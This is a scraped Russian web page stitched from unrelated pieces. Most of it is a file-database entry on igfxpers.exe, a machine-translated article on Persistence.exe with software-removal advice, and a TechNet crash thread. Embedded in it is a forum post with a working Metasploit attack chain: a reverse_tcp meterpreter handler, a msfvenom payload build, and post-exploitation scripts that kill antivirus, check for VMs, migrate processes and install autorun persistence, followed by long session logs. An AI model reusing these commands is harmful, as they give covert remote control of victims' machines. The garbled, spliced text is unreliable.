Persistence module в автозагрузке что это

от admin

Что такое » igfxpers.exe » ?

В нашей базе содержится 9450 разных файлов с именем igfxpers.exe . You can also check most distributed file variants with name igfxpers.exe. Чаще всего эти файлы принадлежат продукту Intel(R) Common User Interface. Наиболее частый разработчик — компания Intel Corporation. Самое частое описание этих файлов — persistence Module. Совокупная оценка — 5( 5 ) (комментариев: 17 ). Это исполняемый файл. Вы можете найти его выполняющимся в диспетчере задач как процесс igfxpers.exe.

Подробности о наиболее часто используемом файле с именем «igfxpers.exe»

Продукт: Intel(R) Common User Interface Компания: Intel Corporation Описание: persistence Module Версия: 8.15.10.2932 MD5: 899d435e1c190c204e349ce0e483098b SHA1: 188cbac1d19ea841a498c1a4812fa3b6fc36fddb SHA256: fc6e84d7a382fbcbf3b2daa4b75bd78f447359f314c1cd4424759e2ec97fd2de Размер: 441968 Папка: C:\Windows\System32 ОС: Windows 7 Частота: Высокая oc2Цифровая подпись: Intel Corporation — pGFX

Icon

System Explorer это наша бесплатная, удостоенная наград программа для быстрой проверки всех работающих процессов с помощью нашей базы данных. Эта программа поможет вам держать систему под контролем.

Что такое Persistence.exe? Это безопасно или вирус? Как удалить или исправить это

Persistence.exe это исполняемый файл, который является частью TI-SmartView для семейства TI-84 Plus Программа, разработанная Texas Instruments Inc, Программное обеспечение обычно о по размеру.

Расширение .exe имени файла отображает исполняемый файл. В некоторых случаях исполняемые файлы могут повредить ваш компьютер. Пожалуйста, прочитайте следующее, чтобы решить для себя, является ли Persistence.exe Файл на вашем компьютере — это вирус или троянский конь, который вы должны удалить, или это действительный файл операционной системы Windows или надежное приложение.

Persistence.exe безопасно, или это вирус или вредоносная программа?

Первое, что поможет вам определить, является ли тот или иной файл законным процессом Windows или вирусом, это местоположение самого исполняемого файла. Например, такой процесс, как Persistence.exe, должен запускаться из C: \ Program Files \ ti education \ ti-smartview ti-84 plus \ ti-smartview_ti-84.exe и нигде в другом месте.

Для подтверждения откройте диспетчер задач, выберите «Просмотр» -> «Выбрать столбцы» и выберите «Имя пути к изображению», чтобы добавить столбец местоположения в диспетчер задач. Если вы обнаружите здесь подозрительный каталог, возможно, стоит дополнительно изучить этот процесс.

Еще один инструмент, который иногда может помочь вам обнаружить плохие процессы, — это Microsoft Process Explorer. Запустите программу (не требует установки) и активируйте «Проверить легенды» в разделе «Параметры». Теперь перейдите в View -> Select Columns и добавьте «Verified Signer» в качестве одного из столбцов.

Если статус процесса «Проверенная подписывающая сторона» указан как «Невозможно проверить», вам следует взглянуть на процесс. Не все хорошие процессы Windows имеют метку проверенной подписи, но ни один из плохих.

  • Находится в C: \ Program Files \ ti education \ ti-smartview ti-84 plus вложенная;
  • Издатель: Texas Instruments Inc
  • Полный путь: C: \ Program Files \ ti education \ ti-smartview ti-84 plus \ ti-smartview_ti-84.exe
  • Файл справки: support.education.ti.com
  • URL издателя: education.ti.com
  • Известно, что до по размеру на большинстве окон;

Если у вас возникли какие-либо трудности с этим исполняемым файлом, вам следует определить, заслуживает ли он доверия, прежде чем удалять файл Persistence.exe. Для этого найдите этот процесс в диспетчере задач.

Найдите его местоположение (оно должно быть в C: \ Program Files \ ti education \ ti-smartview ti-84 plus) и сравните размер и т. Д. С приведенными выше фактами.

Если вы подозреваете, что можете быть заражены вирусом, вы должны немедленно попытаться это исправить. Чтобы удалить вирус Persistence.exe, необходимо Загрузите и установите приложение полной безопасности, например Malwarebytes., Обратите внимание, что не все инструменты могут обнаружить все типы вредоносных программ, поэтому вам может потребоваться попробовать несколько вариантов, прежде чем вы добьетесь успеха.

Кроме того, функциональность вируса может сама влиять на удаление Persistence.exe. В этом случае вы должны включить Безопасный режим с загрузкой сетевых драйверов — безопасная среда, которая отключает большинство процессов и загружает только самые необходимые службы и драйверы. Когда вы можете запустить программу безопасности и полный анализ системы.

Могу ли я удалить или удалить Persistence.exe?

Не следует удалять безопасный исполняемый файл без уважительной причины, так как это может повлиять на производительность любых связанных программ, использующих этот файл. Не забывайте регулярно обновлять программное обеспечение и программы, чтобы избежать будущих проблем, вызванных поврежденными файлами. Что касается проблем с функциональностью программного обеспечения, проверяйте обновления драйверов и программного обеспечения чаще, чтобы избежать или вообще не возникало таких проблем.

Согласно различным источникам онлайн, 6% людей удаляют этот файл, поэтому он может быть безвредным, но рекомендуется проверить надежность этого исполняемого файла самостоятельно, чтобы определить, является ли он безопасным или вирусом. Лучшая диагностика для этих подозрительных файлов — полный системный анализ с Reimage, Если файл классифицируется как вредоносный, эти приложения также удаляют Persistence.exe и избавляются от связанных вредоносных программ.

Однако, если это не вирус, и вам нужно удалить Persistence.exe, вы можете удалить TI-SmartView для семейства TI-84 Plus со своего компьютера с помощью программы удаления, которая должна находиться по адресу: MsiExec.exe / I < DCFC65CB-97F5-4B9D-BFCD-BAEC7B053FAE>. Если вы не можете найти его деинсталлятор, вам может потребоваться удалить TI-SmartView для семейства TI-84 Plus, чтобы полностью удалить Persistence.exe. Вы можете использовать функцию «Установка и удаление программ» на панели управления Windows.

  • 1. в Меню Пуск (для Windows 8 щелкните правой кнопкой мыши в нижнем левом углу экрана), нажмите Панель управления, а затем под Программы:
    o Windows Vista / 7 / 8.1 / 10: нажмите Удаление программы.
    o Windows XP: нажмите Установка и удаление программ.
  • 2. Когда вы найдете программу TI-SmartView для семейства TI-84 Plusщелкните по нему, а затем:
    o Windows Vista / 7 / 8.1 / 10: нажмите Удалить.
    o Windows XP: нажмите Удалить or Изменить / Удалить вкладка (справа от программы).
  • 3. Следуйте инструкциям по удалению TI-SmartView для семейства TI-84 Plus.

Распространенные сообщения об ошибках в Persistence.exe

Наиболее распространенные ошибки Persistence.exe, которые могут возникнуть:

• «Ошибка приложения Persistence.exe».
• «Ошибка Persistence.exe».
• «Возникла ошибка в приложении Persistence.exe. Приложение будет закрыто. Приносим извинения за неудобства».
• «Persistence.exe не является допустимым приложением Win32».
• «Persistence.exe не запущен».
• «Persistence.exe не найден».
• «Не удается найти Persistence.exe».
• «Ошибка запуска программы: Persistence.exe».
• «Неверный путь к приложению: Persistence.exe».

Эти сообщения об ошибках .exe могут появляться во время установки программы, во время выполнения связанной с ней программы TI-SmartView для семейства TI-84 Plus, во время запуска или завершения работы Windows, или даже во время установки Windows. операционная система. Отслеживание момента появления ошибки Persistence.exe является важной информацией при устранении неполадок.

Как исправить Persistence.exe

Аккуратный и опрятный компьютер — это один из лучших способов избежать проблем с TI-SmartView для семейства TI-84 Plus. Это означает выполнение сканирования на наличие вредоносных программ, очистку жесткого диска cleanmgr и ПФС / SCANNOWудаление ненужных программ, мониторинг любых автозапускаемых программ (с помощью msconfig) и включение автоматических обновлений Windows. Не забывайте всегда делать регулярные резервные копии или хотя бы определять точки восстановления.

Читать:
Как делать перенос строчки в самсунг z

Циклический запуск модуля persistence_exe в metasploit после ребута удаленной системы

День добрый,
Буду очень благодарен если кто то подскажет как решить данную проблемму.

имееться exploit/multi/handler на который успешно прилетают коннекты с удаленных систем

сервер:
use exploit/multi/handler
set AUTORUNSCRIPT multi_console_command -r /root/cmd.rc
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set VERBOSE true
set LHOST IP
set LPORT PORT
exploit -jz

скриптт:
run post/windows/manage/priv_migrate
run post/windows/manage/killav
run post/windows/gather/checkvm
run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1. LPORT=4444 -f exe > shell.exe

пример:
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.30:49177) at 2021
[*] Session ID 1 (192.168.1.67:4444 -> 192.168.1.30:49177) processing AutoRunScript ‘multi_console_command -r /root/cmd.rc’
[*] Running Command List .
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine .
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2660) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2888
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jKCAKnwOLUtsoQo
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0704/USER-��_20210801.0704.rc
[*] Meterpreter session 2 opened (192.168.1.67:4444 -> 192.168.1.30:49178) at 2021-08
[*] Session ID 2 (192.168.1.67:4444 -> 192.168.1.30:49178) processing AutoRunScript ‘multi_console_command -r /root/cmd.rc’
[*] Running Command List .
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine .
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2888) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 1036
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\lzgMPfLKEfgVUcz
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0711/USER-��_20210801.0711.rc
[*] Meterpreter session 3 opened (192.168.1.67:4444 -> 192.168.1.30:49179) at 2021-
[*] Session ID 3 (192.168.1.67:4444 -> 192.168.1.30:49179) processing AutoRunScript ‘multi_console_command -r /root/cmd.rc’
[*] Running Command List .
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine .
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (1036) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe
[*] Running module against USER-��
[*] Reading Payload from file /root/shell.exe
[+] Persistent Script written to C:\Users\user\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\user\AppData\Local\Temp\default.exe
[*] Sending stage (176195 bytes) to 192.168.1.30
[+] Agent executed with PID 2828
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jrZXsGOVa
[*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/USER-��_20210801.0717/USER-��_20210801.0717.rc
[*] Meterpreter session 4 opened (192.168.1.67:4444 -> 192.168.1.30:49180) at 2021-08-01 07:07:17 -0400
[*] Session ID 4 (192.168.1.67:4444 -> 192.168.1.30:49180) processing AutoRunScript ‘multi_console_command -r /root/cmd.rc’
[*] Running Command List .
[*] Running command run post/windows/manage/killav
[*] No target processes were found.
[*] Running command run post/windows/gather/checkvm
[*] Checking if USER-�� is a Virtual Machine .
[+] This is a VirtualBox Virtual Machine
[*] Running command run post/windows/manage/priv_migrate
[*] Current session process is default.exe (2828) as: user-ПК\user
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (2736)
[+] Successfully migrated to Explorer.EXE (2736) as: user-ПК\user
[*] Running command run post/windows/manage/persistence_exe REXEPATH=/root/shell.exe

А теперь самое главное:
После ребута удаленного хоста он мне просто циклически начинает создавать кучу сессий(мне нужна всего одна, а он меня просто бомбит ими. ) без остановки, не могу понять где и как это настраиваеться?

Persistence module в автозагрузке что это

21/07/2009 10:37 PM

Files that help describe the problem (some files may no longer be available)

Extra information about the problem

Bucket ID: 323867179

Problem Event Name: BEX64

Application Name: igfxpers.exe

Application Version: 7.14.10.1502

Application Timestamp: 4851c970

Fault Module Name: StackHash_a209

Fault Module Version: 0.0.0.0

Fault Module Timestamp: 00000000

Exception Offset: 0000000000000000

Exception Code: c0000005

Exception Data: 0000000000000008

OS Version: 6.0.6002.2.2.0.768.3

Additional Information 1: a209

Additional Information 2: c85ad3fdb3a61ba084eb3568989c38b7

Additional Information 3: 9c52

Additional Information 4: eeba1e01f1f775f5942d01ad47583a33

Answers

Thanks for posting in Microsoft TechNet Forum.

Based on my research, igfxpers.exe is a common Intel user interface. Generally, file igfxpers.exe is located in the folder C:\Windows\System32 or sometimes in a subfolder of C:\Windows\System32. However, some malware camouflage themselves as igfxpers.exe, particularly if they are located in c:\windows or c:\windows\system32 folder.

In my opinion, I would like to propose some common troubleshooting here, if the issue persists, I may need to suggest that you contact Microsoft Customer Support Service (CSS) for assistance so that this problem can be resolved efficiently. To obtain the phone numbers for specific technology request please take a look at the web site listed below:

If you are outside the US, please refer to http://support.microsoft.com for regional support phone numbers.

To move on, let’s perform the following methods in advance.

1. Scan the whole computer using the latest security software. You can also use some online anti-malware software.

Note: we provide these third party security software for help. Microsoft doesn’t control the security in this website.

2. Run msconfig to disable this process from the startup processes.

Похожие статьи